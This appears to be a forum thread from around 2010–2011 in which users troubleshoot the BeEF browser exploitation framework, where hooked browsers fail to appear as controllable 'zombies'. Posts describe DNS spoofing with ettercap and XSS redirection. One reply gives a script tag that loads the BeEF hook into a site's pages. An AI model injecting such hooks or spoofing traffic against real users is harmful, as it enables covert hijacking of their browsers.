Thread: BeEF Framework - No Zombies (Zombie browser connected)

mcurran

Default BeEF Framework - No Zombies (Zombie browser connected)

Hello:

I have been having a strange issue with BeEF. I have successfully edited etter.dns and use ettercap to dns_spoof my test machine to my server address and the Zombie is detected on the right side of the BeEF Framework page (http://xxx.xxx.x.x/beef/ui), but for some reason it still says no Zombies on the left side of the page and under the zombies dropdown menu. I have tried redirecting the test machine to just the beef/hook directory and also every sample page within the hook directory. I have used both dns_spoofing, xss redirecting, and plain connecting manually in the test machine, and all produce the same results: the zombie is detected and it shows their browser information on the right, but the zombie is not avaible for testing exploits

[SOLVED]

This behavior mysteriously stop occuring when sending the target machines to my ip followed by the example.php page again (e.g. http://***.***.*.*/beef/example.php).

Moderators feel free to remove this thread.
    Last edited by mcurran; 02-08-2010 at 07:21 AM. Reason: SOLVED

Just burned his ISO

Default Re: BeEF Framework - No Zombies (Zombie browser connected)

I'm having the same problem, I've got scripts enabled for all of localhost/beef, and I'm consistently getting messages that a browser is connected in the logs, but it never shows up on the left as a zombie, not even localhost when I run the example.

I have a feeling this is something really simple, anyone know what I might be doing wrong?

Just burned his ISO

double posted sorry :-D

bump, still trying to figure this out. I've experienced this on my bt4 install and the livecd as well
    Last edited by Archangel-Amael; 03-29-2010 at 09:51 PM.

Just burned his ISO

Hello,

I also have this problem.

I extracted Beef on my webhosting and installed Beef via my webbrowser.

The directory that I say the zombies should connect to is: "mysite.com/beef" so I'm not pointing to a specific file, is that what I'm doing wrong?

Because when I try to connect to "mysite.com/beef/example.php" the zombie is only connected on the right side of the browser and the left side says: "no zombies available".

Do I have to enable/link/edit certain scripts in my ftp or something?

Does somebody have a idea of what I might be doing wrong?

Hanna

Just burned his ISO

Nope still haven't figured it out, I've been meaning to try switching computers and see if it's a hardware specific issue but I got sick of playing with it and haven't come back to it yet.

Just burned his ISO

Anyone else who can help us out?

Just burned his ISO

Try inserting this into the <head> part of your site in the web root:-
    <script language='Javascript' src="http://yoursite/beef/hook/beefmagic.js.php"></script>

Just burned his ISO

I came back to play with BEEF after a while, and I think that we're simply misreading it. When a VULNERABLE browser goes to the example.html page it connects and runs any scripts you tell it to, and is available under Available Zombies. If a non-vulnerable browser opens example.html, all you see is the example text. A message comes up in the log that a zombie connected, but it didn't work completely.

Just burned his ISO

I came back to this problem after a while, and I think that it's simply not working on some browsers. When a VULNERABLE browser connects, you get a message in the log and it shows up under Available Zombies. Otherwise, you just get a message in the log

Just burned his ISO

Yeah...same crap over here...when i press the example a dialog box opens up saying something like this Your victim needs to have the following code and i dont appear on zombies list only in the sidebar although that for instances it appeared and i was able to send a dialog box to myself...But i guess the user above has right and we are just misreading it
    The crap i dont understand is that for instances it worked

SOLUTION FOUND>
    You cant close the beef page otherwise it will disappear...if you mantain the example webpage open a zombie will appear on sidebar

100% working *for me*
    Last edited by sickness; 04-20-2011 at 09:35 AM.